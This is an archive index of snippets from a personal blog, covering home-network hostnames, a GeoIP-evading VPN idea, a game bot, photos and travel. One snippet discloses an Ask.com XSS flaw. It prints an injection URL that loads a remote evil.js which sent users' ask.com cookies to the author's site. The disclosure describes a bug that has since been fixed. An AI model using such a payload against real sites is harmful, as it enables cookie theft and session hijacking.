archive-fm.com » FM » G » GREER.FM

Total: 127

Choose link from "Titles, links and description words view":

Or switch to "Titles and links view".
  • Geoff's site: Hostnames
    192 168 1 1 lithium is 192 168 1 3 carbon is 192 168 1 6 and so on Every element also has a standardized abbreviation allowing for short CNAMEs h local domain li local domain c local domain etc Elements have classifications that can be applied to hosts On my network hydrogen is my router rack mount servers are alkali metals embedded devices are noble gasses gaming consoles are

    Original URL path: http://geoff.greer.fm/2009/06/17/hostnames/ (2016-02-15)
    Open archived version from archive


  • Geoff's site: GeoIP Impostor
    Hulu Netflix or Joost At best content available in other countries is a small subset of that in the US A while ago I got the idea of creating a service to allow people to get around these restrictions Here s how it works VPN servers are set up in different countries using virtualization providers like EC2 This allows a new VM with a different IP to be quickly spawned if a host is blocked Clients sign up for the service and download an OpenVPN config or an OpenVPN client bundled with the config They connect to a VPN server in the country they want to pretend they re from All traffic goes over the VPN so the client is effectively an impostor Of course VPNs have many uses besides GeoIP evasion You can safely use public WiFi circumvent censorship in your home country or test for localized outages Many VPN providers exist but I haven t found any that advertise the ability to circumvent GeoIP Most importantly VPN providers usually offer either a single exit point or no way to choose the exit point Anyway I ve set up OpenVPN servers in the US and EU on EC2 An

    Original URL path: http://geoff.greer.fm/2009/05/18/geoip-impostor/ (2016-02-15)
    Open archived version from archive

  • Geoff's site: Refresh Cannon Bot
    The angle goes from 0 90º over 10 seconds so half a second is the difference between 75º and 79 5º Since the novelty of refreshing your browser gets old extremely quickly I wrote a Ruby script to give myself the high score The script just tries a bunch of angles and powers that are likely to result in a hit I have no clue how to do image processing in Ruby so I just checked the HTTP response size The Win image is usually about 1k larger than the Miss image Unfortunately it looks like somebody else wrote their own script and started running it several hours before I discovered the blog post I ll have to settle with second place Update I am now in 1st place I didn t put much effort into the angle power guessing since latency screws up any attempt to methodically carpet bomb the map I account for constant latency but jitter is bad enough that trying the same times between HTTP requests will cause the cannonball to land only in the general area intended Here s my script in case you re curious Yes yes I know it s hideous If I

    Original URL path: http://geoff.greer.fm/2009/05/05/refresh-cannon-bot/ (2016-02-15)
    Open archived version from archive

  • Geoff's site: Ask.com Answer Bar XSS
    Any URI scheme was allowed including javascript and data JavaScript in the URI was run in ask com s security context This link worked until very recently Once I knew I could run arbitrary JavaScript I wrote a proof of concept For a demonstration I asked some coworkers to make sure they were logged in to Ask com then click here TinyURL redirects to http www ask com bar q ask page 1 qsrc 0 zoom ab 0 u javascript document write 22 3Cscript 20src 22http geoff greer fm evil evil js cachebuster Math random 22 3E 3C script 3E 22 which downloaded and ran evil js Evil js sent ask com cookies to my site then added an item to the user s MyStuff saved results The MyStuff item linked to everyone s cookie info It s a good thing Ask doesn t have any useful features otherwise this vulnerability would be newsworthy Instead it s just XSS practice for me and another security mistake by Ask Ask deployed the answer bar on February 5th E mails were sent tickets were filed and it was fixed today March 4th Of course that one bug is the tip of the

    Original URL path: http://geoff.greer.fm/2009/03/04/answer-bar-xss/ (2016-02-15)
    Open archived version from archive

  • Geoff's site: Photography
    significant motion blur poor focus etc I had nine It was cloudy so lighting was low and the color balance was all out of whack Most pictures were underexposed because I kept the shutter speed fast to reduce motion blur Alright so I had eight decent photos I kept an out of focus photo because WordPress galleries do weird things if they re not three columns wide Anyway I fixed

    Original URL path: http://geoff.greer.fm/2009/03/04/photography/ (2016-02-15)
    Open archived version from archive

  • Geoff's site: Snow
    Consulting Snow 29 Dec 2008 Notice the height of the chain link fence in the background The sun came out for a minute Done shoveling the driveway There s a car under all that snow Toys Toys Toys Photography When

    Original URL path: http://geoff.greer.fm/2008/12/29/snow/ (2016-02-15)
    Open archived version from archive

  • Geoff's site: Toys Toys Toys
    Honda CB350 Here are some pictures from a Christmas Day ride on Old San Jose Road I spent the week before Christmas at my aunt s place on Oahu Now I m visiting family in Spokane The amount of snow

    Original URL path: http://geoff.greer.fm/2008/12/28/toys-toys-toys/ (2016-02-15)
    Open archived version from archive

  • Geoff's site: China Trip
    similar in texture and size but very different in taste Since this restaurant did not have picture menus we pointed to the cheapest beer on the menu and as you can see got Budweiser Speaking of beer this bottle of Xihu Light Beer has english text in capital red letters FREE FROM FORMALDEHYDE It s kind of scary to see that warning after you ve spent a week drinking other

    Original URL path: http://geoff.greer.fm/2008/12/11/china-trip/ (2016-02-15)
    Open archived version from archive